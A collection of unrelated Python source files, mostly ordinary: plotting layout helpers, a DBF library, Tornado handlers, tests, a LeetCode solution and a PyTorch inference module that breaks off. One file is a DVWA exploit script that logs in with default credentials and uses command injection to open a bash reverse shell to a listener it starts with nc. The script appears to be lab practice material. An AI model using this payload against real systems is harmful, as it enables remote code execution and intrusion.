gs = gridspec.GridSpec(ny, nx + 1, width_ratios=[1.]*nx + [cbar_width], height_ratios=[1.] * ny)
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=wspace,
hspace=hspace,
)
return fig, gs
def grid2_width(nx=4, ny=2, width=TEXTWIDTH, large_margin=0.14, small_margin=0.03, sep=0.03, cbar_width=0.06):
left = large_margin
right = large_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1)*sep)/ny
height = width / (left + nx*panel_size + cbar_width + nx*sep + right)
return grid2(nx, ny, height, large_margin, small_margin, sep, cbar_width)
def two_figures(height=TEXTWIDTH*0.4, large_margin=0.18, small_margin=0.05, sep=0.21,):
# Geometry (in multiples of height)
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = 1. - top - bottom
# Absolute width
width = height*(left + 2*panel_size+ sep + right)
# wspace and hspace are complicated beasts
avg_width_abs = height*panel_size
avg_height_abs = height*panel_size
wspace = sep * height / avg_width_abs
hspace = sep * height / avg_height_abs
# Set up figure
fig = plt.figure(figsize=(width, height))
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=wspace,
hspace=hspace,
)
ax_left = plt.subplot(1,2,1)
ax_right = plt.subplot(1,2,2)
return fig, ax_left, ax_right
def animated_special(height=TEXTWIDTH*0.4, large_margin=0.18, mid_margin=0.14, small_margin=0.05, flipped=False):
# Geometry (in multiples of height)
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = 1. - top - bottom
sep1 = small_margin + large_margin
sep2 = small_margin * 2
# Absolute width
width = height*(left + 3*panel_size + sep1 + sep2 + right)
# Set up figure
fig = plt.figure(figsize=(width, height))
if flipped:
left = small_margin
sep2 = small_margin + large_margin
# Two left axes
ax_left = fig.add_axes([(left + 2*panel_size + sep1 + sep2)*height/width, bottom, panel_size*height/width, panel_size])
ax_middle = fig.add_axes([(left + panel_size + sep1)*height/width, bottom, panel_size*height/width, panel_size])
# Space for images
images_left = left*height/width
images_bottom = bottom
images_width = panel_size*height/width
images_height = panel_size
else:
# Two left axes
ax_left = fig.add_axes([left*height/width, bottom, panel_size*height/width, panel_size])
ax_middle = fig.add_axes([(left + panel_size + sep1)*height/width, bottom, panel_size*height/width, panel_size])
# Space for images
images_left = (left + 2*panel_size + sep1 + sep2)*height/width
images_bottom = bottom
images_width = panel_size*height/width
images_height = panel_size
return fig, ax_left, ax_middle, (images_left, images_bottom, images_width, images_height)
def add_image_to_roster(fig, axes, total_coords, sep_fraction=0.08):
total_left, total_bottom, total_width, total_height = total_coords
n = len(axes)
rearrange_all = n in [int(x**2) for x in range(2,100)]
n_side = max(int(n**0.5) + 1, 2)
def _coords(i):
ix = i % n_side
iy = i // n_side
panel_width = total_width / (n_side + (n_side - 1) * sep_fraction)
left = total_left + ix * panel_width * (1.0 + sep_fraction)
width = panel_width
panel_height = total_height / (n_side + (n_side - 1) * sep_fraction)
bottom = total_bottom + (n_side - iy - 1) * panel_height * (1.0 + sep_fraction)
height = panel_height
return [left, bottom, width, height]
if rearrange_all:
axes_new = []
for i, ax in enumerate(axes):
axes_new.append(fig.add_axes(_coords(i)))
axes_new[-1].axis('off')
else:
axes_new = axes
axes_new.append(fig.add_axes(_coords(n)))
axes_new[-1].axis('off')
return axes_new
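# Minimal usage sketch (not part of the original module): draw a single square panel.
# setup() enables text.usetex, so a working LaTeX installation (and a matplotlib
# version accepting the list-valued latex preamble above) is assumed; the output
# file name is illustrative.
if __name__ == "__main__":
    setup()
    fig, ax = figure()
    ax.plot([0.0, 1.0], [0.0, 1.0], color=COLOR_FULL)
    ax.set_xlabel(r"$x$")
    ax.set_ylabel(r"$f(x)$")
    fig.savefig("example_panel.pdf")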
|
import os
from setuptools import setup, find_packages
def read(file):
return open(os.path.join(os.path.dirname(__file__), file)).read()
setup(
name="cdqa",
version="1.1.2b",
author="Félix MIKAELIAN, André FARIAS, Matyas AMROUCHE, Olivier SANS, Théo NAZON",
description="An End-To-End Closed Domain Question Answering System",
long_description=read("README.md"),
long_description_content_type="text/markdown",
keywords="reading comprehension question answering deep learning natural language processing information retrieval bert",
license="Apache-2.0",
url="https://github.com/cdqa-suite/cdQA",
packages=find_packages(),
install_requires=read("requirements.txt").split(),
)
|
from interface import Subject
"""
Notes:
- Setter is used to notify that changes have occurred
- Fields temperature, humidity, pressure are "private".
This means that we are preventing the alteration of any of
them without notification from their observers
- I have doubts about the presence of getters methods in this class.
- WheaterData represents a topic to subcribe containing
states that change.
"""
class WeatherData(Subject):
def __init__(self):
self.observers = []
# abstracts states that when modified
# will notify their subscribers
self._temperature = 0.0
self._humidity = 0.0
self._pressure = 0.0
def register_observer(self, observer):
self.observers.append(observer)
def remove_observer(self, observer):
self.observers.remove(observer)
def notify_observers(self):
for observer in self.observers:
observer.update(self._temperature, self._humidity, self._pressure)
def measurements_changed(self):
self.notify_observers()
def set_measurements(self, temperature, humidity, pressure):
self._temperature = temperature
self._humidity = humidity
self._pressure = pressure
self.measurements_changed()
def get_temperature(self):
return self._temperature
def get_humidity(self):
return self._humidity
def get_pressure(self):
return self._pressure
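# Minimal usage sketch (not part of the original file): a hypothetical observer that
# implements the update() signature notify_observers() calls.
if __name__ == '__main__':
    class CurrentConditionsDisplay:
        def update(self, temperature, humidity, pressure):
            print('Now: %.1f C, %.1f%% humidity, %.1f hPa' % (temperature, humidity, pressure))
    weather_data = WeatherData()
    weather_data.register_observer(CurrentConditionsDisplay())
    weather_data.set_measurements(21.5, 65.0, 1013.1)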
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Created by {{ cookiecutter.full_name }}
|
import tornado.web
from handlers.base_handler import BaseHandler
from models.group import Group
from models.user import User
from .util import check_group_permission
from forms.forms import GroupForm
class GroupsHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
group_name = self.get_argument('group_name', '')
groups = Group.search_name(group_name)
self.render('group/groups.html', groups=groups)
@tornado.web.authenticated
def post(self):
form = GroupForm(self.request.arguments)
if form.validate():
group = Group(**form.data)
user_id = self.get_current_user_id()
user = User.get(user_id)
user.groups.append(group)
group.save()
self.redirect(self.reverse_url('group', group.id))
else:
            self.redirect(self.reverse_url('groups'))  # TODO: pass an error message
class GroupHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def get(self, group_id):
group = Group.get(group_id)
self.render('group/group.html', group=group)
class GroupEditHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def post(self, group_id):
form = GroupForm(self.request.arguments)
if form.validate():
group = Group.get(group_id)
group.update(**form.data)
group.save()
self.redirect(self.reverse_url('group', group_id))
else:
self.redirect(self.reverse_url('group', group_id))
class GroupDeleteHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def post(self, group_id):
Group.get(group_id).delete()
self.redirect(self.reverse_url('groups'))
class GroupMemberAdditionHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def get(self, group_id):
user_name = self.get_argument('user_name', '')
users = User.search_name(user_name)
users = [user for user in users if not user.belongs_to_group(group_id)]
group = Group.get(group_id)
self.render('group/member_addition.html', users=users, group=group)
@check_group_permission
@tornado.web.authenticated
def post(self, group_id):
user_id = self.get_argument('user_id', '')
user = User.get(user_id)
group = Group.get(group_id)
user.groups.append(group)
user.save()
self.redirect(self.reverse_url('member_addition', group_id))
class GroupUserHandler(BaseHandler):
@check_group_permission
@tornado.web.authenticated
def get(self, group_id):
group = Group.get(group_id)
self.render('group/group_users.html', group=group)
|
#! /usr/bin/env python
"""DBF accessing helpers.
FIXME: more documentation needed
Examples:
Create new table, setup structure, add records:
dbf = Dbf(filename, new=True)
dbf.addField(
("NAME", "C", 15),
("SURNAME", "C", 25),
("INITIALS", "C", 10),
("BIRTHDATE", "D"),
)
for (n, s, i, b) in (
("John", "Miller", "YC", (1980, 10, 11)),
("Andy", "Larkin", "", (1980, 4, 11)),
):
rec = dbf.newRecord()
rec["NAME"] = n
rec["SURNAME"] = s
rec["INITIALS"] = i
rec["BIRTHDATE"] = b
rec.store()
dbf.close()
    Open an existing dbf and read some data:
dbf = Dbf(filename, True)
for rec in dbf:
for fldName in dbf.fieldNames:
print '%s:\t %s (%s)' % (fldName, rec[fldName],
type(rec[fldName]))
print
dbf.close()
"""
"""History (most recent first):
11-feb-2007 [als] export INVALID_VALUE;
Dbf: added .ignoreErrors, .INVALID_VALUE
04-jul-2006 [als] added export declaration
20-dec-2005 [yc] removed fromStream and newDbf methods:
        the argument of the __init__ call must be used instead;
added class fields pointing to the header and
record classes.
17-dec-2005 [yc] split to several modules; reimplemented
13-dec-2005 [yc] adapted to the changes of the `strutil` module.
13-sep-2002 [als] support FoxPro Timestamp datatype
15-nov-1999 [jjk] documentation updates, add demo
24-aug-1998 [jjk] add some encodeValue methods (not tested), other tweaks
08-jun-1998 [jjk] fix problems, add more features
20-feb-1998 [jjk] fix problems, add more features
19-feb-1998 [jjk] add create/write capabilities
18-feb-1998 [jjk] from dbfload.py
"""
__version__ = "$Revision: 1.7 $"[11:-2]
__date__ = "$Date: 2007/02/11 09:23:13 $"[7:-2]
__author__ = "Jeff Kunce <kuncej@mail.conservation.state.mo.us>"
__all__ = ["Dbf"]
import header
import record
from utils import INVALID_VALUE
class Dbf(object):
"""DBF accessor.
FIXME:
    docs and examples needed (don't forget to tell
about problems adding new fields on the fly)
Implementation notes:
``_new`` field is used to indicate whether this is
    a new data table. `addField` can be used only for
    new tables! Once at least one record has been appended
    to the table, its structure can't be changed.
"""
__slots__ = ("name", "header", "stream",
"_changed", "_new", "_ignore_errors")
HeaderClass = header.DbfHeader
RecordClass = record.DbfRecord
INVALID_VALUE = INVALID_VALUE
## initialization and creation helpers
def __init__(self, f, readOnly=False, new=False, ignoreErrors=False):
"""Initialize instance.
Arguments:
f:
Filename or file-like object.
new:
True if new data table must be created. Assume
data table exists if this argument is False.
readOnly:
            if the ``f`` argument is a string, the file will
            be opened in read-only mode; in other cases
this argument is ignored. This argument is ignored
even if ``new`` argument is True.
headerObj:
`header.DbfHeader` instance or None. If this argument
is None, new empty header will be used with the
all fields set by default.
ignoreErrors:
if set, failing field value conversion will return
``INVALID_VALUE`` instead of raising conversion error.
"""
if isinstance(f, basestring):
# a filename
self.name = f
if new:
# new table (table file must be
# created or opened and truncated)
self.stream = file(f, "w+b")
else:
                # table file must exist
self.stream = file(f, ("r+b", "rb")[bool(readOnly)])
else:
# a stream
self.name = getattr(f, "name", "")
self.stream = f
if new:
# if this is a new table, header will be empty
self.header = self.HeaderClass()
else:
# or instantiated using stream
self.header = self.HeaderClass.fromStream(self.stream)
self.ignoreErrors = ignoreErrors
self._new = bool(new)
self._changed = False
## properties
closed = property(lambda self: self.stream.closed)
recordCount = property(lambda self: self.header.recordCount)
fieldNames = property(
lambda self: [_fld.name for _fld in self.header.fields])
fieldDefs = property(lambda self: self.header.fields)
changed = property(lambda self: self._changed or self.header.changed)
def ignoreErrors(self, value):
"""Update `ignoreErrors` flag on the header object and self"""
self.header.ignoreErrors = self._ignore_errors = bool(value)
ignoreErrors = property(
lambda self: self._ignore_errors,
ignoreErrors,
doc="""Error processing mode for DBF field value conversion
if set, failing field value conversion will return
``INVALID_VALUE`` instead of raising conversion error.
""")
## protected methods
def _fixIndex(self, index):
"""Return fixed index.
        This method fails if the index isn't a numeric object
        (long or int) or isn't in a valid range (less than or
        equal to the number of records in the db).
If ``index`` is a negative number, it will be
treated as a negative indexes for list objects.
Return:
            Return value is a numeric object meaning a valid index.
"""
if not isinstance(index, (int, long)):
raise TypeError("Index must be a numeric object")
if index < 0:
# index from the right side
# fix it to the left-side index
index += len(self) + 1
if index >= len(self):
raise IndexError("Record index out of range")
return index
    ## interface methods
def close(self):
self.flush()
self.stream.close()
def flush(self):
"""Flush data to the associated stream."""
if self.changed:
self.header.setCurrentDate()
self.header.write(self.stream)
self.stream.flush()
self._changed = False
def indexOfFieldName(self, name):
"""Index of field named ``name``."""
# FIXME: move this to header class
return self.header.fields.index(name)
def newRecord(self):
"""Return new record, which belong to this table."""
return self.RecordClass(self)
def append(self, record):
"""Append ``record`` to the database."""
record.index = self.header.recordCount
record._write()
self.header.recordCount += 1
self._changed = True
self._new = False
def addField(self, *defs):
"""Add field definitions.
For more information see `header.DbfHeader.addField`.
"""
if self._new:
self.header.addField(*defs)
else:
raise TypeError("At least one record was added, "
"structure can't be changed")
## 'magic' methods (representation and sequence interface)
def __repr__(self):
return "Dbf stream '%s'\n" % self.stream + repr(self.header)
def __len__(self):
"""Return number of records."""
return self.recordCount
def __getitem__(self, index):
"""Return `DbfRecord` instance."""
return self.RecordClass.fromStream(self, self._fixIndex(index))
def __setitem__(self, index, record):
"""Write `DbfRecord` instance to the stream."""
record.index = self._fixIndex(index)
record._write()
self._changed = True
self._new = False
#def __del__(self):
# """Flush stream upon deletion of the object."""
# self.flush()
def demoRead(filename):
_dbf = Dbf(filename, True)
for _rec in _dbf:
print
print repr(_rec)
_dbf.close()
def demoCreate(filename):
_dbf = Dbf(filename, new=True)
_dbf.addField(
("NAME", "C", 15),
("SURNAME", "C", 25),
("INITIALS", "C", 10),
("BIRTHDATE", "D"),
)
for (_n, _s, _i, _b) in (
("John", "Miller", "YC", (1981, 1, 2)),
("Andy", "Larkin", "AL", (1982, 3, 4)),
("Bill", "Clinth", "", (1983, 5, 6)),
("Bobb", "McNail", "", (1984, 7, 8)),
):
_rec = _dbf.newRecord()
_rec["NAME"] = _n
_rec["SURNAME"] = _s
_rec["INITIALS"] = _i
_rec["BIRTHDATE"] = _b
_rec.store()
print repr(_dbf)
_dbf.close()
if (__name__=='__main__'):
import sys
_name = len(sys.argv) > 1 and sys.argv[1] or "county.dbf"
demoCreate(_name)
demoRead(_name)
# vim: set et sw=4 sts=4 :
|
import matplotlib.pyplot as plt
class SignChangeSparseMap:
def __init__(self):
self.x_plus = []
self.x_minus = []
self.y_plus = []
self.y_minus = []
def add_right_change(self, x, y):
self.x_plus.append([x, y])
def add_left_change(self, x, y):
self.x_minus.append([x, y])
def add_up_change(self, x, y):
self.y_plus.append([x, y])
def add_down_change(self, x, y):
self.y_minus.append([x, y])
def to_dict(self):
return {
'__sign_change_sparse_map__': True,
'x_plus': self.x_plus,
'x_minus': self.x_minus,
'y_plus': self.y_plus,
'y_minus': self.y_minus,
}
@staticmethod
def from_dict(dict):
if '__sign_change_sparse_map__' not in dict:
raise RuntimeError('not a SignChangeSparseMap dict')
restored_sparse_map = SignChangeSparseMap()
restored_sparse_map.x_plus = dict['x_plus']
restored_sparse_map.x_minus = dict['x_minus']
restored_sparse_map.y_plus = dict['y_plus']
restored_sparse_map.y_minus = dict['y_minus']
return restored_sparse_map
def plot(self, save_path=""):
[xs, ys] = [[i for i, j in self.x_plus], [j for i, j in self.x_plus]]
plt.plot(xs, ys, 'y.')
[xs, ys] = [[i for i, j in self.x_minus], [j for i, j in self.x_minus]]
plt.plot(xs, ys, 'r.')
[xs, ys] = [[i for i, j in self.y_plus], [j for i, j in self.y_plus]]
plt.plot(xs, ys, 'g.')
[xs, ys] = [[i for i, j in self.y_minus], [j for i, j in self.y_minus]]
plt.plot(xs, ys, 'b.')
plt.xlabel('x')
plt.ylabel('y')
if save_path:
plt.savefig(save_path)
else:
plt.show()
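# Minimal usage sketch (not part of the original file): record a few sign changes,
# round-trip them through the dict form (e.g. for JSON storage), then plot.
if __name__ == '__main__':
    import json
    sparse_map = SignChangeSparseMap()
    sparse_map.add_right_change(1, 2)
    sparse_map.add_left_change(2, 2)
    sparse_map.add_up_change(3, 4)
    sparse_map.add_down_change(4, 3)
    restored = SignChangeSparseMap.from_dict(json.loads(json.dumps(sparse_map.to_dict())))
    restored.plot()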
|
#!/usr/bin/python3
import requests
import re
import sys
import subprocess
import shlex
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
class Interface ():
def __init__ (self):
self.red = '\033[91m'
self.green = '\033[92m'
self.white = '\033[37m'
self.yellow = '\033[93m'
self.bold = '\033[1m'
self.end = '\033[0m'
def header(self):
print('\n >> DVWA - Remote Code Execution')
print(' >> by twseptian\n')
def info (self, message):
print(f"[{self.white}*{self.end}] {message}")
def warning (self, message):
print(f"[{self.yellow}!{self.end}] {message}")
def error (self, message):
print(f"[{self.red}x{self.end}] {message}")
def success (self, message):
print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")
# Instantiate our interface class
global output
output = Interface()
output.header()
security_level = "medium"
target_ip = '172.17.0.2' #change target ip
target_port = '80' #change target port
localhost = '172.17.0.1' #change localhost ip
localport = '4444' #change localport
url = 'http://'+target_ip+':'+target_port+'/login.php'
def csrf_token():
try:
# check request into url target
output.info("URL: %s/login.php" %target_ip)
r = requests.get(url, allow_redirects= False)
except:
output.error("\n[!] csrf_token: Failed to connect URL. \n[i] Quitting")
sys.exit(-1)
#Extract anti-csrf token
source = BeautifulSoup(r.text, "html.parser")
user_token = source("input", {"name": "user_token"})[0]["value"]
output.info("Grabbing user_token: %s"% user_token)
#Extract session information
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)
output.info("Grabbing session_id: %s"%session_id)
return session_id, user_token
def login_to_dvwa(session_id, user_token):
#POST Data
global cookies
data = {"username": "admin", "password": "password", "Login":"Login","user_token": user_token}
cookies = {"PHPSESSID": session_id, "security": security_level}
headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0","Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5","Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded","Content-Length": "88"
}
try:
print("\n")
output.info("URL: %s/login.php" %target_ip)
output.info("Data: %s" %data)
output.info("Cookie: %s" %cookies)
r = requests.post(url, data=data, cookies=cookies, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
except:
output.error("Login failed, quiting")
sys.exit(-1)
if r.headers["Location"] != 'index.php':
output.error("Login failed")
exit()
output.success("Logged in Successfully")
return True
def command_injection():
output.warning("Command Injection to remote code execution")
payload = "127.0.0.1|/bin/bash -c 'bash -i >& /dev/tcp/"+localhost+"/"+localport+" 0>&1'"
data_input = {"ip": payload,"Submit": "Submit"}
listener = "nc -nvlp {}".format(localport)
args = shlex.split(listener)
subprocess.Popen(args)
output.warning("Take RCE\n")
input_ci = requests.post('http://'+target_ip+':'+target_port+'/vulnerabilities/exec/', cookies=cookies, data=data_input, proxies=proxies)
def main():
# Get initial CSRF token
session_id, user_token = csrf_token()
# Login to DVWA
login_to_dvwa(session_id, user_token)
# Trigger Command Injection,RCE
command_injection()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
|
"""
==============================================================================
Element unit tests
==============================================================================
@File : testElements.py
@Date : 2021/07/29
@Author : Alasdair Christison Gray
@Description :
"""
# ==============================================================================
# Standard Python modules
# ==============================================================================
import unittest
from parameterized import parameterized_class
# ==============================================================================
# External Python modules
# ==============================================================================
import numpy as np
# ==============================================================================
# Extension modules
# ==============================================================================
from FEMpy import QuadElement, Lagrange1dElement, serendipityQuadElement
# --- Elements to test: ---
# QuadElement: 1st to 4th order
# SerendipityQuad
# Lagrange1DElement: 1st to 4th order
test_params = []
for el in [Lagrange1dElement, QuadElement, serendipityQuadElement]:
if el in [QuadElement, Lagrange1dElement]:
for order in range(1, 5):
element = el(order=order)
test_params.append({"element": element, "name": element.name})
else:
element = el()
test_params.append({"element": element, "name": element.name})
@parameterized_class(test_params)
class ElementUnitTest(unittest.TestCase):
def setUp(self) -> None:
self.tol = 1e-10
self.numTestPoints = 4
np.random.seed(1)
def testGetParamCoord(self):
error = self.element.testGetParamCoord(self.numTestPoints, maxIter=400, tol=self.tol * 1e-3)
np.testing.assert_allclose(error, 0, atol=self.tol, rtol=self.tol)
def testShapeFunctionDerivatives(self):
error = self.element.testShapeFunctionDerivatives(self.numTestPoints)
np.testing.assert_allclose(error, 0, atol=self.tol, rtol=self.tol)
def testShapeFunctionSum(self):
sum = self.element.testShapeFunctionSum(self.numTestPoints)
np.testing.assert_allclose(sum, 1, atol=self.tol, rtol=self.tol)
if __name__ == "__main__":
unittest.main()
|
import logging
class LogConfigurator(object):
"""Console logging that can be configured by verbosity levels."""
def __init__(self, root=None, root_level=logging.INFO):
self.root = logging.getLogger() if root is None else root
self.root.setLevel(root_level)
self.__file_handler = None
self.__console_handler = None
@property
def console_handler(self):
if self.__console_handler is None:
self.__console_handler = logging.StreamHandler()
return self.__console_handler
def map_verbosity_to_level(self, value):
"""Verbosity value is just an integer count of v-char in `-vvvv`."""
return logging.CRITICAL - (value * 10) % logging.CRITICAL
def set_console_handler(self, verbosity):
self.console_handler.setLevel(self.map_verbosity_to_level(verbosity))
# if self.root.level < self.console_handler.level:
# self.root.level = self.console_handler.level
self.root.level = self.console_handler.level
format_str = '%(asctime)s %(name)-30s %(levelname)-8s %(message)s'
datefmt_str = '%m-%d %H:%M:%S'
self.console_handler.setFormatter(
logging.Formatter(format_str, datefmt_str))
self.root.addHandler(self.console_handler)
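# Minimal usage sketch (not part of the original module): with this mapping a
# verbosity count of 0 -> CRITICAL, 1 -> ERROR, 2 -> WARNING, 3 -> INFO, 4 -> DEBUG.
if __name__ == '__main__':
    configurator = LogConfigurator()
    configurator.set_console_handler(verbosity=2)
    logging.getLogger(__name__).warning('shown at -vv')
    logging.getLogger(__name__).debug('suppressed at -vv')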
|
#-------------------------------------------------------------------------------
# Evaluate Division
#-------------------------------------------------------------------------------
# By Ying Peng
# https://leetcode.com/problems/evaluate-division/
# Completed 11/30/20
#-------------------------------------------------------------------------------
# Approach
#-------------------------------------------------------------------------------
"""
1. Create a directed weighted graph that takes all the values provided and their inverse
2. For each query, dfs to find whether path exists
"""
#-------------------------------------------------------------------------------
# Solution
#-------------------------------------------------------------------------------
class Solution:
def _create_graph(self, equations, values):
self.graph = {}
for div, value in zip(equations, values):
if self.graph.get(div[0]) is None:
self.graph[div[0]] = [(div[1], value)]
else:
self.graph[div[0]].append((div[1], value))
if self.graph.get(div[1]) is None:
self.graph[div[1]] = [(div[0], 1 / value)]
else:
self.graph[div[1]].append((div[0], 1 / value))
def _dfs(self, start, goal, product, visited):
if self.graph.get(start) is None or self.graph.get(goal) is None or start in visited:
return -1
visited.append(start)
for neighbor, value in self.graph[start]:
print(neighbor, value)
if neighbor == goal:
return product * value
else:
product_updated = self._dfs(neighbor, goal, product * value, visited)
if product_updated != -1:
return product_updated
return -1
def calcEquation(self, equations: [[str]], values: [float], queries: [[str]]) -> [float]:
self._create_graph(equations, values)
res = []
for query in queries:
res.append(self._dfs(str(query[0]), str(query[1]), 1, []))
return res
#-------------------------------------------------------------------------------
# Unit Test
#-------------------------------------------------------------------------------
import unittest
class TestSolution(unittest.TestCase):
    def test_example(self):
        # Basic check using the example from the problem statement
        equations = [["a", "b"], ["b", "c"]]
        values = [2.0, 3.0]
        queries = [["a", "c"], ["b", "a"], ["a", "e"], ["a", "a"], ["x", "x"]]
        self.assertEqual(Solution().calcEquation(equations, values, queries),
                         [6.0, 0.5, -1.0, 1.0, -1.0])
if __name__ == '__main__':
unittest.main()
|
import numpy as np
import math
def poisson_lambda_mle(d):
"""
Computes the Maximum Likelihood Estimate for a given 1D training
dataset from a Poisson distribution.
"""
return sum(d) / len(d)
def likelihood_poisson(x, lam):
"""
    Computes the class-conditional probability for a univariate
Poisson distribution
"""
if x // 1 != x:
likelihood = 0
else:
likelihood = math.e**(-lam) * lam**(x) / math.factorial(x)
return likelihood
if __name__ == "__main__":
# Plot Probability Density Function
from matplotlib import pyplot as plt
training_data = [0, 1, 1, 3, 1, 0, 1, 2, 1, 2, 2, 1, 2, 0, 1, 4]
mle_poiss = poisson_lambda_mle(training_data)
true_param = 1.0
x_range = np.arange(0, 5, 0.1)
y_true = [likelihood_poisson(x, true_param) for x in x_range]
y_mle = [likelihood_poisson(x, mle_poiss) for x in x_range]
plt.figure(figsize=(10,8))
plt.plot(x_range, y_true, lw=2, alpha=0.5, linestyle='--', label='true parameter ($\lambda={}$)'.format(true_param))
plt.plot(x_range, y_mle, lw=2, alpha=0.5, label='MLE ($\lambda={}$)'.format(mle_poiss))
plt.title('Poisson probability density function for the true and estimated parameters')
plt.ylabel('p(x|theta)')
plt.xlim([-1,5])
plt.xlabel('random variable x')
plt.legend()
plt.show()
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2019 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from migrate.changeset import UniqueConstraint
from sqlalchemy import MetaData, Table
ENGINE = 'InnoDB'
CHARSET = 'utf8'
def upgrade(migrate_engine):
"""
This database upgrade drops the old unique constraint and creates
new unique constraint for the kube_app table.
"""
meta = MetaData()
meta.bind = migrate_engine
kube_app = Table('kube_app', meta, autoload=True)
UniqueConstraint('name', table=kube_app).drop()
UniqueConstraint('name', 'app_version', table=kube_app,
name='u_app_name_version').create()
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
# As per other openstack components, downgrade is
# unsupported in this release.
raise NotImplementedError('SysInv database downgrade is unsupported.')
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 19 19:29:07 2018
@author: yiyuezhuo
"""
'''
A relatively generalized framework is employed here, e.g. applying common
distributions rather than only mean-field or full-rank multivariate normal.
PyTorch 0.4 new features are required.
core3 moves q_size from the first dimension to the last dimension to leverage broadcasting.
'''
import torch
import contextlib
# The two helper classes are used to annotate which parameters should
# be optimized
class Parameter(torch.Tensor):
def __new__(cls,*args,**kwargs):
kwargs['requires_grad'] = True
tensor = torch.tensor(*args,**kwargs)
tensor.__class__ = cls
return tensor
class Data(torch.Tensor):
'''
This class may be unnecessary.
'''
def __new__(cls,*args,**kwargs):
kwargs['requires_grad'] = False
tensor = torch.tensor(*args,**kwargs)
tensor.__class__ = cls
return tensor
def collect_variable_labeled_class(target_f,classes):
parameters_dict = {}
for key,value in target_f.__globals__.items():
if isinstance(value, classes):
parameters_dict[key] = value
return parameters_dict
def collect_parameters(target_f):
return collect_variable_labeled_class(target_f, Parameter)
def collect_parameter_datas(target_f):
return collect_variable_labeled_class(target_f, (Parameter,Data))
class VariationalMeanFieldDistribution:
def __init__(self,target_f, q_size=1):
self.target_f = target_f
        self.q_size = q_size  # number of variational samples per step
self.params = {}
for name,variable in collect_parameters(target_f).items():
param = dict(loc = variable,
omega = torch.zeros(variable.shape, requires_grad=True),
size = variable.shape + torch.Size([q_size]))
self.params[name] = param
def sample(self):
for name,param in self.params.items():
loc,scale,size = param['loc'],torch.exp(param['omega']),param['size']
noise = torch.distributions.Normal(0,1).sample(size)
_loc = loc.unsqueeze(-1).expand_as(noise)
_scale = scale.unsqueeze(-1).expand_as(noise)
self.target_f.__globals__[name] = noise * _scale + _loc
def parameters(self):
rl = []
for name,param in self.params.items():
rl.extend([param['loc'], param['omega']])
return rl
def log_prob(self):
logq = 0.0
for name,param in self.params.items():
shape = param['loc'].shape + (self.q_size,)
_loc = param['loc'].unsqueeze(-1).expand(shape)
_omega = param['omega'].unsqueeze(-1).expand(shape)
q_dis = torch.distributions.Normal(_loc, torch.exp(_omega))
q_log_prob = q_dis.log_prob(self.target_f.__globals__[name])
for i in range(len(self.params[name]['size'])-1):
q_log_prob = q_log_prob.sum(0)
logq += q_log_prob
return logq
@contextlib.contextmanager
def transform_meanfield(target_f, q_size = 1):
    '''
    Add a q_size dimension to all variables labeled Parameter and Data
    in target_f.__globals__ with samples of the variational distribution.
    On exit, the state is reset and the variational parameter loc values
    are rewritten to their original values. The other variational
    parameters can be collected inside the with-block.
    '''
cache = collect_parameter_datas(target_f)
for name,variable in cache.items():
if isinstance(variable,Data):
extended = variable.unsqueeze(-1).expand(variable.shape + (q_size,))
target_f.__globals__[name] = Data(extended)
q_dis = VariationalMeanFieldDistribution(target_f, q_size = q_size)
yield q_dis
target_f.__globals__.update(cache)
def vb_meanfield(target_f, n_epoch = 100, lr=0.01, q_size = 1):
with transform_meanfield(target_f, q_size = q_size) as q_dis:
optimizer = torch.optim.SGD(q_dis.parameters(), lr=lr)
for i in range(n_epoch):
q_dis.sample()
logp = target_f()
logq = q_dis.log_prob()
target = logp.mean(0) - logq.mean(0) # reduce q_size dimention
loss = -target
optimizer.zero_grad()
loss.backward()
optimizer.step()
return q_dis # Though calling sample or other method may cause misleading.
    # Maybe returning only trimmed params is a better choice?
def vb_fullrank(target_f, n_epoch = 100, lr=0.01, q_size = 1):
raise NotImplementedError
def sampling_hmc(target_f, leap_frog_step = 0.01, leap_frog_length = 20,
trace_length = 100):
pd = collect_parameters(target_f)
trace = []
potential_trace = []
def grad():
# zero_grad manually
for name in pd:
target_f.__globals__[name].grad = None
target = target_f()
target.backward()
return target
def get_potential(target, r):
#target = target_f()
potential = target.detach()
for name in pd:
#potential -= r[name] @ r[name]
potential -= 0.5 * torch.sum(r[name] * r[name])
            # It's interesting to see that torch.dot or @ doesn't support size-0 tensors
return potential
for trace_i in range(trace_length):
r = {}
for name in pd:
r[name] = torch.randn_like(target_f.__globals__[name])
trace.append({name: target_f.__globals__[name].detach() for name in pd})
potential_trace.append(get_potential(target_f(), r))
# leap-frog procedure
for frog_i in range(leap_frog_length):
grad()
for name in pd:
r[name] += (leap_frog_step/2) * target_f.__globals__[name].grad
theta = target_f.__globals__[name].detach() + leap_frog_step * r[name]
#print(r[name],theta)
target_f.__globals__[name] = Parameter(theta)
target = grad()
for name in pd:
